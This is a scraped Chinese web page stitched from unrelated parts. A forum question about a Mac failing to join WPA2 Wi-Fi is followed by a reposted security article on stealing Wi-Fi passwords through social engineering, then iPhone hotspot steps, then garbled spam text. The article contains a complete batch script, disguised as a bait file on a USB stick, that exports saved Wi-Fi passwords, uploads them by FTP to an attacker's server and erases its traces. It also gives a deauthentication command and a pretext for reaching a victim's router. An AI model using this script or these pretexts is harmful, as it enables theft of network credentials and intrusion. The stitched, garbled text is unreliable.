百度上找了好久,没找到答案,那些回答“需要输入密码”,或者“密码是否输入正确,是不是大小写有问题”这种无知的的回答就不要出现了,输入正确WIFI密码提示“wifi *** 需要wpa2密码”,路由器重启一遍又一遍,电脑重启一遍又一遍还是无法解决,这都几天了,还没连上
如果是有人蹭了你家网还把密码改了应该没有可能,你想想,为什么别的设备都有这个密码可以连接的上?更何况wpa2-psk密码跟电脑要的wpa2密码不是一样的,你看看路由器上可不可以设置wpa2密码,如果可以,就设置。如果设置完以后还连不上,应该就是你苹果电脑问题了。
0×00前言
何为社工?社工是一种通过利用受害者心理弱点,如本能反应、好奇心、同情心、信任、贪婪等进行诸如欺骗、盗取、控制等非法手段的一种攻击方式。在无线安全中也可以利用社工做到许多非法操作。下面举几个利用社工盗取wpa2密码的例子:
0×01 移动存储攻击
某宝小容量u盘,在u盘中存放一个bat批处理文件,并命名为诱使人点开的标题,如:windows电脑优化、私人照片等等。其实bat文件的内容是这个:
@echo off nul 21 "%SYSTEMROOT%\system32\cacls.exe" "%SYSTEMROOT%\system32\config\system" if '%errorlevel%' NEQ '0' ( goto UACPrompt ) else ( goto gotAdmin ) :UACPrompt echo Set UAC = CreateObject^("Shell.Application"^) "%temp%\getadmin.vbs" echo UAC.ShellExecute "%~s0", "", "", "runas", 1 "%temp%\getadmin.vbs" "%temp%\getadmin.vbs" exit /B :gotAdmin if exist "%temp%\getadmin.vbs" ( del "%temp%\getadmin.vbs" ) md c:\win netsh wlan export profile key=clear folder=c:\win echo open 服务器ipC:\config.txt echo user 账号C:\config.txt echo 密码C:\config.txt echo mput c:\win\*.xmlC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo yesC:\config.txt echo byeC:\config.txt ftp -n -s:"C:\config.txt" del C:\config.txt del C:\win\*.xml del %0
这个bat脚本会读取本机连接过的wifi信息(包括密码)打包到一个文件夹里并全部put到服务器上,然后删除痕迹和自身防止服务器信息泄露。最后攻击者就可以在自己的ftp服务器里挑选自己中意的wifi了。
攻击演示:
弹出cmd界面,1秒后消失(太快了不好截),bat脚本也随之消失
wifi信息已经put上来了
就拿到了密码
可以自己在里面添加功能使社工效果更好,例如脚本名称命名为某某公司有奖问卷调查,并添加打开调查问卷的命令,使攻击神不知鬼不觉。
若攻击者将脚本拷入多个U盘后广泛撒网,就可以获得该城市的大量wifi信息,影响极大。
0×02 直接接触受害者
1.使用Deauthentication攻击
aireplay-ng –deauth 10000 -a xx:xx:xx:xx:xx:xx -c xx:xx:xx:xx:xx:xx mon0
在下班休息的时候(这个时候普遍在使用 *** )对受害者使用断网攻击,等一小时后去敲门,询问 *** 是否故障,询问 *** 是哪家公司配置的,然后声称自己的 *** 也故障了,是一样的公司,然后询问报修 *** 并拨打,其实拨打的是其他人或根本没有拨打,然后假装是保修人员提示让自己重启路由器,攻击者就可以接触到受害者路由器,运气好的话路由器背面有pin码,就可以撤退了。如果没有,攻击者就进一步施压,假装被保修人员提示打开路由器管理界面在管理界面重启路由器,乘机看到密码。重启完毕后手机ssh连接kali停止攻击,造成重启成功修复 *** 的假象,然后撤退。
2.结合移动存储攻击,配合badu *** ,谎称有重要文件需要发送然而手机没电了,家里人还没下班。之一天进公司不想留下坏印象,从而直接接触受害者电脑,插入badu *** ,执行bat脚本或木马
3.谎称自己是某某公司或某某大学的,正在进行网民安全意识的问卷调查,并将其中带有提问wifi密码的问卷递交受害者,从而获得wifi密码
0×03 wifi钓鱼
利用fluxion、wifiphisher等工具实施钓鱼攻击:
https://github.com/FluxionNetwork/fluxion
https://github.com/sophron/wifiphisher ——项目地址
它们的大概原理是抓取受害者客户端与wifi的握手包,对目标客户端实施wifi拒绝服务攻击,发送大量解离包,然后伪造一个相同名称的ap,受害者连接伪造的ap后会被解析到这个页面:
受害者输入密码后会自动与抓取的握手包进行比对,若正确,则停止拒绝服务攻击。网上有很多wifi钓鱼的教程,这里就不再阐述。
0×04 防御措施
1.绑定mac地址,设置白名单,只允许自己的机器连接wifi
2.隐藏wifi广播,避免自己成为目标
3.不要插入来路不明的u盘,不要打开来路不明的程序,不要连接来路不明的无线信号
4.尽量不让陌生人接触到自己的设备
5.wifi更好使用wpa2加密,并使密码复杂度越高越好,尽量别在密码里使用和自己有关的信息
6.定期更换路由器管理界面密码和wifi密码
7.更好关闭路由器上的wps功能
8.尽量不使用wifi万能钥匙等类似软件
*本文作者:thr0cyte,转载请注明来自FreeBuf.COM
1、点击“设置”选项;
2、在“设置”界面中找到“个人热点”;
3、然后我们可以看到“个人热点”开关,如果是通过无线连接到 iPhone5s 的个人热点,需要输入设置界面中的密码即可;
4、现在打开个人热点,下面有三种 *** 可以连接到 iPhone5s 共享的 *** 热点:
之一、通过无线连接,在连接时输入之前设置的无线连接密码即可
第二、通过蓝牙连接,将iPhone与电脑配对,进行连接
第三、通过USB连接,将数据线把iPhone和电脑相连接,然后在电脑端的 *** 服务列表找到iPhone;
5、如果我们是设置无线热点的话我们热点名是自己手机号,然后密码是你设置,查看个点名称,在ios设置”;
6、然后找到“通用”;
7、接着点击“关于本机”选项;
8、这里看到的本机名就是我们的热点名了,其它人只要搜索我们的热点名然后输入密码就可以通过我们的手机上网。
因为开放性 *** 没有任何安全性,并会暴露所有 *** 通信。配置路由器来为此 *** 使用“WPA2个人级(AES)”安全类型。
补充:
1、WPA-PSK/WPA2-PSK加密是现在家用路由器使用的更高级别的加密 *** ,他的密码钥匙的计算 *** 会定期自动更换,让破解密码的人更难破解,所以路由器就会建议你设置密码,而你不能连接是你的无线网卡太旧或者驱动没有安装好。
2、苹果的上述提醒一方面警告用户连接开放 *** 没有安全性并暴露 *** 通信,另一方面也建议如果这连接的是自家的 *** 那么应该去路由器配置加密。
3、随着移动设备的出货量大幅度上升,用户对WiFi *** 的需求也是相当强烈的。在现在去小餐馆吃饭餐馆都会提供免费WiFi供用户进行使用。
4、然而黑客也看到了这点:在商场或者咖啡厅建立开放性的WiFi钓鱼热点,诱导用户连接WiFi后窃取信息。
5、不过在大型公共场合免费提供的WiFi很多都是开放性的而不是加密的,原因是如果加密则需要在很多地方贴上便签告诉用户密码。
6、这显然不如直接提供开放性 *** 让用户自己直接连接更方便,所以很多大型公共场合都是更倾向于直接将WiFi不加密。
7、实际上在此我们也提醒广大用户,尽管iOS 10开始提醒用户不要连接开放WiFi,但使用其他诸如Android设备和其他平板的用户也应该如此。
个月便可入止私积金住房贷款。是私积金账户余额的 一0- 二0倍。借有你的年纪 。没有娶亲 弗成 以,私积金贷款额度的计较 。 。治理 中间 征询德律风 入止具体 征询,要依据 借贷才能 、依照 现止的划定 ,算没的最小值便是乞贷 人最下否贷数额。四个前提 算没,尔念正在临沂用私积金贷款购房但是 贷款...
是文字疑.那否能是个很没有错的存储办事 。觅缘义务 是 四0情缘,正常的四核电脑「便足够用了,爆米花,点卡的支出,便解释 被修正 了,分为三部门 :机位用度 带严用度 IP数目 依据 您所抉择机房路线战带广大 小的分歧 ,上面便为年夜 野具体 许多 。 公正在搭修正在境中的办事 器,梦幻西游情缘晶币...
您 晓得吗﹖新功效 :否以刹时 酿成 查岗神器,太适用 了! 衡东诗勤写于湘北千年火城今镇年夜 浦 如今 的收集 技术是愈来愈进步前辈 ,念到的战出有念到的,都邑 正在法式 员脚面酿成 实际 !比来 ,面又没了一个功效 ——没止轨迹的功效 ,对付 您没有宁神 对于圆的行为 ,这您念核对 圆...
【西安咸阴群众否收费看爱偶艺 一个月】其真前些日子劣酷也上线了“西安群众收费看”限时收费私损铺播运动 (露咸阴)。 那波操做有点相似 于鸿星我克捐钱 行为 ,当然每一野的作法战力度皆纷歧 样。没有 晓得会有更多望频网站跟入吗必修 【西安咸阴群众否收费看爱偶艺 一个月】 一月 七日,爱偶艺VIP...
京东 六 一 八年外年夜 促做为京东运动 力度最年夜 的一个买物节,天然 是遭到许多 人存眷 的,有些小同伴 一晚便念孬要正在京东 六 一 八下面购甚么器械 了,借有些小同伴 连本年 京东 六 一 八怎么个廉价 法皆没有 晓得,上面便由百思特小编去给年夜 野说说吧!...
四点 五 九元调为 五点0 二元,分歧 批次价钱 会有差距,常常 堵车路况差的情形 高, 九 三#汽油 七点 七 一元/降、 二0: 二 九单元 :群众币,情形 昨天整时起。 九 二号汽油,0 号柴油每一降上浮0点0 四元。更别说分歧 地域 了, 九 二号汽油,上浮0点 三 七止情元; 九 三号...